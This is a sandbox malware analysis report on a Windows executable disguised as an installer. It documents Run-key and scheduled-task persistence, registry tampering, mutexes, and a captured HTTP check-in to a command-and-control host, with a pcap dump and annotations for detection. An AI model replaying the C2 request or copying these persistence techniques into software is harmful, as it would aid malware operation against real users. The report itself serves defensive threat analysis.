Analysis Date: 2014-09-07 21:02:57
MD5: 8c478a63095b0c288108e60ac093c64d
SHA1: 9c32cd826eadaed22bd50d8756009b775259a0e4

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: c14783ebc9b73607d9bcd2733d69b56a sha1: 7f99eabdf97edbbb2885e72b79ce6a6d40d1b12e size: 14848
Section.rdata md5: e720d75af01bba6e36af497fedd94624 sha1: 63c914de8af7206e73da81d8a090edc39c47b35f size: 512
Section.data md5: 34423a9c76082f36f5436dac9bc41a5f sha1: be5199c9b5dbfac2381547b593e8514e1b363c37 size: 110592
Section.rsrc md5: 5eee1fdda576a48287bc7c2d94353fc6 sha1: c806e8edf43cd16d182bc3bff5b6dc8bb6ef3526 size: 5120
Timestamp: 2009-07-17 02:11:33 (PE header compile time — attacker-controlled and unverifiable; it predates the analysis date by five years)
Version info:
LegalCopyright: Copyright © 2009 m setup technologies
InternalName: iphone setup win32 3
FileVersion: 4.4.0.0
CompanyName: Jordan Russell
LegalTrademarks:
Comments:
ProductName: internet security
ProductVersion: 4.4.0.0
FileDescription: p Setup Self-Extractor a7
OriginalFilename: iphone setup win32 3
PEhash: 370231ecff65bf1f88d55d10201386e2738537a6
IMPhash: 9557b76fd592606f0344de02cdf8221e
Note: the version resource is internally inconsistent and should be treated as decoy metadata rather than provenance. CompanyName carries the name of the Inno Setup author, yet the embedded manifest (see Strings) identifies the stub as "Nullsoft Install System v2.46", and the error strings (DVCLAL, "Invalid property path", "This program must be run under Win32") are Delphi VCL runtime strings. The filler names ("p Setup Self-Extractor a7", "m setup technologies", "internet security") look generated. The 110 KB .data section next to a 14.5 KB .text section is consistent with a small stub carrying an embedded payload — confirm by unpacking. Pivot on the IMPhash and per-section hashes rather than on any version-info field.

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates Process: C:\malware.exe (the sample re-launches its own image; the second process instance is listed below)
Creates Mutex: Global\{F5CC5A0A-B9E5-411f-BF7E-EACE3BBC2BF1}
Creates Mutex: {A14B1A1D-023F-40dc-BBFE-208B1DAD2F82}

Process
↳ C:\malware.exe

Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\0ESKOMO9JO ➝
C:\malware.exe
(user-level Run-key persistence; the value name 0ESKOMO9JO looks randomly generated and reappears as the HKCU\Software subkey below, so it is probably per-sample or per-infection — do not rely on the literal string as a cross-sample indicator)
Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
NULL
(reported with value NULL — this may be a query rather than a write; the report does not distinguish the two)
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\\\x03\1601 ➝
NULL
(the \x03 is a garbled zone key — presumably zone 3, the Internet zone; the value written is not shown, so the effect of this access cannot be determined from the report)
Registry: HKEY_CURRENT_USER\Software\0ESKOMO9JO\OteH ➝
xC7aKZ+O6wyPlq1krRM4sG7m2LFGsYtHjHOagBf10Uk/n4gL8s8xs9LeD5KQVh3/j+XFa0mnr175UElKKyciA2gn6tUEA721Fj4P\\x00
(a NUL-terminated, base64-looking blob stored under the same random key — likely encrypted configuration or a bot identifier; it uses the same encoding as the POST body in the Network section)
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝
1
(together with the ProxyEnable access above, the sample reads or modifies Internet Explorer / WinInet proxy and zone settings; the WininetConnectionMutex and index.dat artifacts below confirm its HTTP traffic goes through WinInet, so these settings govern its C2 path)
Creates File: C:\WINDOWS\Tasks\{22116563-108C-42c0-A7CE-60161B75E508}.job
(a second persistence mechanism: a legacy Task Scheduler .job file; collect it from the guest to recover the trigger and command line, which this report does not show)
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File: PIPE\lsarpc
Creates File: \Device\Afd\Endpoint
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
(the index.dat files and the cache-directory mutexes below are side effects of issuing HTTP through WinInet; \Device\Afd\Endpoint is the Winsock socket object. The guest is Windows XP/2003 — "Documents and Settings" layout — so Vista+ behaviour, including the requireAdministrator manifest prompt, was not exercised in this run)
Creates Mutex: c:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex: Global\{F5CC5A0A-B9E5-411f-BF7E-EACE3BBC2BF1}
Creates Mutex: WininetConnectionMutex
Creates Mutex: c:!documents and settings!administrator!cookies!
Creates Mutex: c:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Creates Mutex: {A14B1A1D-023F-40dc-BBFE-208B1DAD2F82}
(the two GUID mutexes are created by both process instances and are the most reusable host-based indicators in this report — presumably a single-instance guard)
Winsock DNS: lacvictoria.com
Winsock DNS: qqplot.com

Network Details:

DNS: wsj.com
Type: A
205.203.140.1
DNS: wsj.com
Type: A
205.203.132.65
DNS: wsj.com
Type: A
205.203.132.1
DNS: wsj.com
Type: A
205.203.140.65
DNS: fastclick.com
Type: A
64.156.167.84
DNS: nifty.com
Type: A
210.131.4.217
DNS: qqplot.com
Type: A
109.74.195.149
DNS: lacvictoria.com
Type: A
(no address returned)
DNS: paulo-fg.com
Type: A
(no address returned)
DNS: bonreligion.com
Type: A
(no address returned)
Note: wsj.com, fastclick.com and nifty.com are legitimate, widely hosted domains and are plausibly connectivity checks rather than command-and-control — do not block them. lacvictoria.com, paulo-fg.com and bonreligion.com did not resolve at analysis time (expired, sinkholed or fallback domains — cannot tell from here). qqplot.com is the only domain actually contacted. All addresses were captured in September 2014 and are likely stale; re-resolve before using them as network indicators.
HTTP POST: http://qqplot.com/borders.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Flows TCP: 192.168.1.1:1031 ➝ 109.74.195.149:80
(192.168.1.1 is the sandbox guest, not an indicator. The User-Agent is hard-coded — it claims IE 6 on Windows 2000 while the guest is XP — and is usable in a network signature together with the URI path /borders.php, Content-Type application/x-www-form-urlencoded and a body consisting solely of a base64-looking "data=" parameter. In the capture below the body is 341 bytes, matching the declared Content-Length, and the 336-character base64 value ("A==" padded) decodes to an opaque blob — presumably encrypted check-in data. No server response is captured, so whether the C2 was live at analysis time cannot be determined from this report.)

Raw Pcap
0x00000000 (00000)   504f5354 202f626f 72646572 732e7068   POST /borders.ph
0x00000010 (00016)   70204854 54502f31 2e310d0a 41636365   p HTTP/1.1..Acce
0x00000020 (00032)   70743a20 2a2f2a0d 0a436f6e 74656e74   pt: */*..Content
0x00000030 (00048)   2d547970 653a2061 70706c69 63617469   -Type: applicati
0x00000040 (00064)   6f6e2f78 2d777777 2d666f72 6d2d7572   on/x-www-form-ur
0x00000050 (00080)   6c656e63 6f646564 0d0a5573 65722d41   lencoded..User-A
0x00000060 (00096)   67656e74 3a204d6f 7a696c6c 612f342e   gent: Mozilla/4.
0x00000070 (00112)   30202863 6f6d7061 7469626c 653b204d   0 (compatible; M
0x00000080 (00128)   53494520 362e303b 2057696e 646f7773   SIE 6.0; Windows
0x00000090 (00144)   204e5420 352e3029 0d0a486f 73743a20    NT 5.0)..Host: 
0x000000a0 (00160)   7171706c 6f742e63 6f6d0d0a 436f6e74   qqplot.com..Cont
0x000000b0 (00176)   656e742d 4c656e67 74683a20 3334310d   ent-Length: 341.
0x000000c0 (00192)   0a436f6e 6e656374 696f6e3a 204b6565   .Connection: Kee
0x000000d0 (00208)   702d416c 6976650d 0a436163 68652d43   p-Alive..Cache-C
0x000000e0 (00224)   6f6e7472 6f6c3a20 6e6f2d63 61636865   ontrol: no-cache
0x000000f0 (00240)   0d0a0d0a 64617461 3d2f436a 45665a44   ....data=/CjEfZD
0x00000100 (00256)   53767871 43694b30 6c74554d 31757932   SvxqCiK0ltUM1uy2
0x00000110 (00272)   2f797534 55355970 4e6d3176 2f2f6a54   /yu4U5YpNm1v//jT
0x00000120 (00288)   6e675663 2b774d73 2b2b5a42 6a375a53   ngVc+wMs++ZBj7ZS
0x00000130 (00304)   59547233 69426b47 2f672b37 5643432b   YTr3iBkG/g+7VCC+
0x00000140 (00320)   7639306d 784f4870 37655263 48506959   v90mxOHp7eRcHPiY
0x00000150 (00336)   6f393930 4d55756a 67555734 62765449   o990MUujgUW4bvTI
0x00000160 (00352)   644e2f6a 50587547 506a6142 7a786c63   dN/jPXuGPjaBzxlc
0x00000170 (00368)   63356d70 4e303161 36742f51 69535858   c5mpN01a6t/QiSXX
0x00000180 (00384)   77707a39 486d306b 7a396642 6661556e   wpz9Hm0kz9fBfaUn
0x00000190 (00400)   3130782f 474c636f 66526948 344c7646   10x/GLcofRiH4LvF
0x000001a0 (00416)   73416947 59467361 696f4d57 30374b30   sAiGYFsaioMW07K0
0x000001b0 (00432)   4533726b 6b334d65 5a557967 44654c47   E3rkk3MeZUygDeLG
0x000001c0 (00448)   77327331 322b6f50 4d4e726e 4a5a637a   w2s12+oPMNrnJZcz
0x000001d0 (00464)   687a5a38 78694e57 75355467 4f687134   hzZ8xiNWu5TgOhq4
0x000001e0 (00480)   4f715553 30424d54 644b3262 5a792f68   OqUS0BMTdK2bZy/h
0x000001f0 (00496)   7833546e 6d477954 464c4868 4c635266   x3TnmGyTFLHhLcRf
0x00000200 (00512)   2b76417a 494f424e 6d763433 43444b32   +vAzIOBNmv43CDK2
0x00000210 (00528)   51303541 56636d41 38324b68 54665573   Q05AVcmA82KhTfUs
0x00000220 (00544)   732f476f 6c77786c 6d396b4c 6e726e6c   s/Golwxlm9kLnrnl
0x00000230 (00560)   49367034 366e3336 642f3334 6b705656   I6p46n36d/34kpVV
0x00000240 (00576)   32623651 672f413d 3d                  2b6Qg/A==


Strings
.
..."
.
t
..
.
.
.
.(
./
040904E4
 2009 m setup technologies 
4.4.0.0
BBABORT
Cannot open file "%s". %s
CFru
Comments
CompanyName
Copyright 
cwMK
DVCLAL
Error reading %s%s%s: %s
EzRL
Failed to get data for '%s'
FileDescription
FileVersion
GMnpw
InternalName
 internet security 
Invalid argument to date encode
Invalid argument to time encode
Invalid data type for '%s' List capacity out of bounds (%d)
Invalid property element: %s
Invalid property path
Invalid property type: %s
Invalid property value
Invalid stream format$''%s'' is not a valid component name
 iphone setup win32 3
Jordan Russell
LegalCopyright
LegalTrademarks
List count out of bounds (%d)
List index out of bounds (%d)+Out of memory while expanding memory stream
lrn7
MS Sans Serif
OLE error %.8x.Method '%s' not supported by automation object/Variant does not reference an automation object7Dispatch methods do not support more than 64 parameters!'%s' is not a valid integer value('%s' is not a valid floating point value
OriginalFilename
Out of memory
ProductName
ProductVersion
Property is read-only
Property %s does not exist
p Setup Self-Extractor a7
Resource %s not found
%s.Seek not implemented$Operation not allowed on sorted list$%s not in a class registration group
Stream read error
Stream write error
StringFileInfo
TEXTFILEDLG
Translation
UTfC
VarFileInfo
VQO6
VS_VERSION_INFO
0$Fb"/fNv
0HlV%h
0(j/uX
0[n?Nqv
0uq4Z@
[194HX/QCC`
1^}BuJ
1dot3u
1o|_x,
1r$@NW
!}1RwU
2EUuWmvOtOc@16
+)(2PO
33333333?333333
333333333333333333
3333333333333338
3333339
333338
33333833
333838
3_c(?{#
3=)R6B 
3uM8nla
48yBjF3
4B<$D$
($4B<L
4D:H'8
:,@:4@:<@:D@%L
|4pPrFJ
4z&Yf;
>5h>"H
5k^2J4
,686R<
6V(sio_n
@/ \^7
7 [A@N
7FJAprh &y[0}v
7h!ClN
7i=-.p
^7kQ4q
.7N{Imp!$L
-8?9cK
$$8BL`
8+;),H
8$LB`p
9-]7BF(i
:!@:-@:9@$Dc
9/KfBEB
_9^(u!
a7Cb$@c
AbTknBhzX@
 ag2C]?
A.kSz<
A{^oYO
AQPZSR
 $(B08
b5mu14
'{B6":b
B7(R1PtT
B8]h%p
b:](9q
Bd8Mx15bi
bf,v^o
=B.LS D
>bltt.
#,Bqkng
!`>c~(0
cA0xXbBU
CallNextHookEx
CharLowerA
CharLowerBuffA
CidJH?$
>cP*.`
crypt32
cs4F	"
Cx7a$[`@Nq
CX[YZD
'D9W(J
@.data
D,'bBAt
|$dBP:
D@c"tOg
DDm{GF
=dHT?/
 D`np.
_dszEJKw0qE3
d+UKu<:!:
+D%;yy
@E\6nEq
e9+eBm'g5
EK_LbCb
!.,ELp
eP/0&Q
?EpH4k
ExitProcess
f%`avD
Fd^uN{
fiaHnL	gI
f%`Kaf
)fr5(>
f'R^LP
F,^s<il
f]*vD%
G8Z]/8>
GdVY5H
GetMenu
GetStringTypeW
GetThreadLocale
GetTickC
GetTickCount
GetUserDefaultLCID
GetVersion
G{lf"&S
"GNChp
gwEJV<
h1nXAe
H:8+w.u
\$hBt|
HE	'`q
/)/"hgH
HOHx_&6
HPN#,?
Hvc`*6
H\Xh+y%
hX-j^O
 =' I6z
 IFo;[}-
ik"""h
i%L+05
 iphone setup win32 3
IQSTRX
|iS6.9
IsCharUpperA
IwR?tn
j9$ /P
Jb0lPr
_#ji=b
@JI.b!a
jW7jQ	
KERNEL32.dll
=k*=f-s8
k%'S:'
k#X!Zt
@:!L*>
LDQwxG
%'LDvd
LJSS.F
LoadLibraryA
l!W3OR\
*m4A+I
m,=5k]Y+D
M'5T"DL
>@M$}6n0*
mB,a~I
MbWlwr
Mc1K6]
=ml'xp
M{Or*9
Mr3f;0tq
mSDnQ`
MtxIXF
;MZu{i
,n1o%|
@N6'L[
nbxICjI
)NN!XD
@Nq,	8
-[@@Nqv
nVa85+
+OiY2J
-!oOqNi
$ O*P,
oQIs)P)\
ounq&~I
O{w<wW+
<$PBd|
P'D8LxE][Z
;pDtg-
phR'@lOXHl/D
	pNo#Rul
Ppvx g
PQReA@=
P$XB`d
Qc(#[2
`+q:F:7
'QOU:N
qozy^c
\Q_tVJ
QV'Or~VH
r0*F}zF
`.rdata
`.rd?atd
RDLtP~
R\Tz/#R
)ru_?b
RwCnWfz0d@12
>s"7:F
S#E;T"
sGNA'LOBAc
`S%:_h
\s({[H7.
[Sl_fWo
s<l`wCsf
SW;oDAC3
sxPO[WU#q
SYb6':#
s	Z'Ab
!t~{2D'w
tc	!:D
T*g@(Rj
This program must be run under Win32
tL:Rtla
tLT5&_
trGdHt
TrJ2)/q
tsG8_d8
tTHXN(k<
TV"Bxo4?"
TYyYHb
u(6S$v 
u	/Aa+F
(uJ8??
user32.dll
%/VB0l
VbR6mL
- V_C'
=V/hbZ
VirtualAlloc
+VPqR%
+{>\VS
V?TW)w
w6i?`V
wHfQTS7yH527g
W[KQ3u
WRSPm'
~ W&}T
>[	W{>/(=Y
x@9YdB
(X~?'D
\	{Xe-
;+X l(]41U7G
]Xlda,
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="Nullsoft.NSIS.exehead" type="win32"/><description>Nullsoft Install System v2.46</description><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="X86" publicKeyToken="6595b64144ccf1df" language="*" /></dependentAssembly></dependency><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="requireAdministrator" uiAccess="false"/></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/></application></compatibility></assembly>
(embedded NSIS 2.46 exehead manifest: requestedExecutionLevel="requireAdministrator" forces a UAC elevation prompt on Vista and later — the supportedOS GUIDs appear to be the Vista and Windows 7 compatibility IDs — so on those systems the Run-key and .job persistence above would be installed with administrative rights; the XP guest ignores this element. The NSIS identity here contradicts the Inno-Setup-style version info and the Delphi runtime strings elsewhere in this listing, which reinforces that the packaging metadata is not trustworthy.)
x@Nu7(
=XNV_p
/x_RA=
X"W,TJ<CT
XyD\'d
xzIl5M!r
Y^bHVR/P
@yDD'L
ygD~Lx/
Y|[SnX@
YtB'me
#yT"o2
z[*5dD
z6zcVn
ZFtyu+
ZXO328
#z,XWTJ9Mw
zzIRwXX